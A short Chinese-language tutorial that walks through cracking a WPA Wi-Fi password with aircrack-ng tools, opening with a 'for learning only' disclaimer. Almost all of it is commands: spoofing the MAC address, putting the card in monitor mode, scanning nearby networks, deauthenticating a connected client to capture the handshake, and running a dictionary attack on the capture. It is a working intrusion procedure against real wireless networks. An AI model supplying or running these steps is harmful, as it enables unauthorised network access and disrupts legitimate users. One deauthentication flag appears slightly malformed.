聲明:本教程僅供學習用,不得用於任何非法活動,造成的一切後果本人概不負責!
步驟:
1. 修改自己的MAC地址
# ifconfig wlan0 down
# macchanger -m 00:11:22:33:44:55 wlan0
# ifconfig wlan0 up
2. 啓動監聽
# airmon-ng start wlan0
3. 修改mon0的MAC地址
# ifconfig mon0 down
# macchanger -m 00:11:22:33:44:55 mon0
# ifconfig mon0 up
4. 列出所有可掃描的網絡列表
# airodump-ng mon0
5. 仔細找到有Station的那個網絡,記下BSSID,再單獨掃描該網絡,並把結果寫入crack_cap文件中(後面的抓握手包同樣會保存在裏面)
# airodump-ng -w crack_cap --bssid xx:xx:xx:xx:xx mon0
6. 開另一個Terminal抓握手包,將AP_BSSID改成上面找到的BSSID,將Station_BSSID改成上面對應的Station的BSSID
# aireplay-ng -0 -4 -a <AP_BSSID> -c <Station_BSSID> mon0
7. 在進行上一步時仔細觀察第一個Terminal的上面有沒有顯示Handshake,如沒有,重複第6步,直至出現該字樣
8. 拿到握手包後就開始進行破解了,dict.txt是密碼字典文件, crack_cap.cap是之前保存寫入的文件,裏面包括握手包
# aircrack-ng crack_cap.cap -w dict.txt
9. 現在就是等待時間了,如果沒有找到密碼,嘗試找另一個密碼字典文件,再重複第8步